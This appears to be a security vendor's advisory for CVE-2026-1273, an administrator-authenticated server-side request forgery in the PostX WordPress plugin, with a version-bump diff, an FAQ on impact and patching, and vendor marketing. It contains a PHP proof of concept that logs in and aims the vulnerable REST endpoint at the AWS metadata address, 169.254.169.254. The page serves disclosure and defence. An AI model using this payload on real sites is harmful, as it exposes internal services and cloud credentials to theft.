* Description: <a href="https://www.wpxpo.com/postx/?utm_source=db-postx-plugin&utm_medium=details&utm_campaign=postx-dashboard">PostX</a> is the #1 Gutenberg Blocks plugin with 38+ free blocks that includes post gird, post list, post slider, carousel, news ticker, etc. Advanced capabilities like dynamic site building and design variations make it the best choice for creating News Magazine sites, and any kind of blog such as Personal Blogs, Travel Blogs, Fashion Blogs, Food Reviews, Recipe Blogs, etc.
- * Version: 5.0.8
+ * Version: 5.0.9
* Author: Post Grid Team by WPXPO
* Author URI: https://www.wpxpo.com/postx/?utm_source=db-postx-plugin&utm_medium=details&utm_campaign=postx-dashboard
* Text Domain: ultimate-post
@@ -14,7 +14,7 @@
defined( 'ABSPATH' ) || exit;
// Define
-define( 'ULTP_VER', '5.0.8' );
+define( 'ULTP_VER', '5.0.9' );
define( 'ULTP_URL', plugin_dir_url( __FILE__ ) );
define( 'ULTP_BASE', plugin_basename( __FILE__ ) );
define( 'ULTP_PATH', plugin_dir_path( __FILE__ ) );Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1273 - PostX <= 5.0.8 - Authenticated (Administrator+) Server-Side Request Forgery via REST API Endpoints
<?php
$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'admin';
$password = 'password';
// Step 1: Authenticate and obtain WordPress nonce and cookies
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $admin_url,
'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
// Step 2: Extract the REST API nonce from the admin page (required for the request)
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, 0);
$admin_page = curl_exec($ch);
// This is a simplified example. In a real scenario, you would need to parse the page for the nonce.
// For this PoC, we assume the nonce is known or the site has been configured to not require it in the vulnerable version.
$nonce = '1234567890'; // Placeholder. Replace with a valid nonce extracted from the page.
// Step 3: Craft the SSRF payload targeting the internal service (e.g., metadata endpoint)
$ssrf_payload = array(
'site_url' => 'http://169.254.169.254/latest/meta-data/' // AWS metadata service example
);
// Step 4: Send the exploit request to the vulnerable REST endpoint
$exploit_url = $target_url . '/wp-json/ultp/v3/starter_dummy_post/';
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($ssrf_payload));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
'X-WP-Nonce: ' . $nonce
));
$exploit_response = curl_exec($ch);
// Step 5: Output the response from the internal service
echo "Exploit Response:n";
echo $exploit_response;
curl_close($ch);
?>Frequently Asked Questions
What is CVE-2026-1273?
Understanding the vulnerabilityCVE-2026-1273 is a Server-Side Request Forgery (SSRF) vulnerability found in the PostX plugin for WordPress. It allows authenticated users with Administrator-level access to make arbitrary HTTP requests from the server, potentially exposing internal services.
How does the vulnerability work?
Mechanism of exploitationThe vulnerability arises from the use of the `wp_remote_get()` function in the plugin’s REST API endpoints without proper validation. This allows an attacker to supply a URL that the server will request, leading to unauthorized access to internal resources.
Who is affected by this vulnerability?
Identifying vulnerable installationsAny WordPress site using the PostX plugin version 5.0.8 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.
How can I check if my site is vulnerable?
Verifying plugin versionsYou can check the version of the PostX plugin installed on your WordPress site by navigating to the Plugins section in the WordPress admin dashboard. If the version is 5.0.8 or lower, your site is vulnerable.
How can I fix this vulnerability?
Updating the pluginTo fix CVE-2026-1273, update the PostX plugin to version 5.0.9 or later. This version includes a patch that replaces the vulnerable code and adds necessary security measures.
What if I cannot update the plugin immediately?
Mitigation strategiesIf immediate updating is not possible, consider disabling the PostX plugin until a safe version can be installed. Additionally, review user permissions to limit access to trusted administrators only.
What does a CVSS score of 7.2 indicate?
Understanding severity ratingsA CVSS score of 7.2 indicates a high severity level, suggesting that the vulnerability poses a significant risk. It is advisable to address such vulnerabilities promptly to prevent potential exploitation.
What are the practical risks of this vulnerability?
Potential impacts of exploitationExploitation of this vulnerability can lead to unauthorized access to internal services, information disclosure, and potentially remote code execution if combined with other vulnerabilities. This can severely compromise site security.
How does the proof of concept demonstrate the issue?
Example of exploitationThe proof of concept provided illustrates how an attacker can authenticate as an administrator and use the vulnerable endpoints to send requests to arbitrary URLs. This demonstrates the SSRF capability and the potential for accessing sensitive internal resources.
What additional security measures should I consider?
Enhancing overall securityIn addition to updating the plugin, consider implementing web application firewalls, regular security audits, and monitoring for unusual activities. Keeping all plugins and themes updated is essential for maintaining site security.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
